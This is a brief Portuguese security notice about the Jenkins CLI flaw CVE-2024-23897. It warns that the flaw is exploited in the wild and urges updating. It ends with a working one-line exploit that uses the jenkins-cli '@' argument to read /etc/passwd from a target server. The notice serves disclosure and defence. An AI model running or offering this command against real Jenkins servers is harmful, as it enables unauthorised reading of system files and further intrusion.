
CVE-2024-23897 jenkins-cli
CVE-2024-23897 jenkins-cli
Observamos o Jenkins File Leak / RCE (CVE-2024-23897) sendo explorado na natureza e conseguimos reproduzi-lo.
Se o seu Jenkins permite usuários anônimos ou registro de usuários, atualize-o imediatamente para a versão mais recente.
java -jar jenkins-cli.jar -s https://www.wevul.com @/etc/passwd
